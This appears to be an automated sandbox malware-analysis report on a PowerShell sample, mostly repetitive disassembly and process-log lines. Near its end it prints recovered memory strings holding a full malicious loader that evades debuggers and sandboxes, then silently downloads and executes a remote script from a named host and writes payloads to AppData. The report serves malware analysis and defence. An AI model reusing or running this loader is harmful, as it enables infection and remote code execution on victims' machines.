                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_046697C2 push esp; ret 4_2_04669801
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0466818F pushfd ; iretd 4_2_04668193
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04661303 push ebx; iretd 4_2_04661332
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04660CE0 push eax; ret 4_2_04660CEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04660CF0 push eax; ret 4_2_04660CFA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04660D00 push eax; ret 4_2_04660D0A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F531C6 push esp; iretd 4_2_06F531C9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E307A push eax; iretd 4_2_081E3081
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052CD50 push eax; mov dword ptr [esp], E2EDECDFh8_2_0052CD52
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051E5E1 push ecx; ret 8_2_0051E5E4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00529DE0 push eax; mov dword ptr [esp], 16171011h8_2_00529DEE
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS -FILEPATH "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-NOPROFILE -EXECUTIONPOLICY BYPASS -COMMAND & {IEX ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://CDN1.KLIPBAZYXUI.SHOP/VANKOK.VSTX'))}" -WINDOWSTYLE HIDDEN;$KOOFE = $ENV:APPDATA;FUNCTION WMFSF($VABSC, $OQIY){[IO.FILE]::WRITEALLBYTES($OQIY, (NEW-OBJECT (ITLU $CSIZ.SUBSTRING(103,26))).DOWNLOADDATA($VABSC))};FUNCTION ITLU($IZOOJ){RETURN (($IZOOJ -SPLIT '(?<=\G..)'|%{$CSIZ.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IZOOJ(){FUNCTION RGDG($HZTNZ){IF(!(TEST-PATH -PATH $OQIY)){WMFSF (ITLU $HZTNZ) $OQIY}}}IZOOJ;
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IEX-7IW8*QJH5XK/TJAS)C/46CYZVR2VDDE{PUWO;#W1MB~IGM0UB_LOA@TK#S;DQ\M:Y(J"RC49{{8.%6NXP}ZGQF.3RSFHNQAEHXL93315576353142709944317955FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS -FILEPATH "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-NOPROFILE -EXECUTIONPOLICY BYPASS -COMMAND & {IEX ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://CDN1.KLIPBAZYXUI.SHOP/VANKOK.VSTX'))}" -WINDOWSTYLE HIDDEN;$KOOFE = $ENV:APPDATA;FUNCTION WMFSF($VABSC, $OQIY){[IO.FILE]::WRITEALLBYTES($OQIY, (NEW-OBJECT (ITLU $CSIZ.SUBSTRING(103,26))).DOWNLOADDATA($VABSC))};FUNCTION ITLU($IZOOJ){RETURN (($IZOOJ -SPLIT '(?<=\G..)'|%{$CSIZ.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IZOOJ(){FUNCTION RGDG($HZTNZ){IF(!(TEST-PATH -PATH 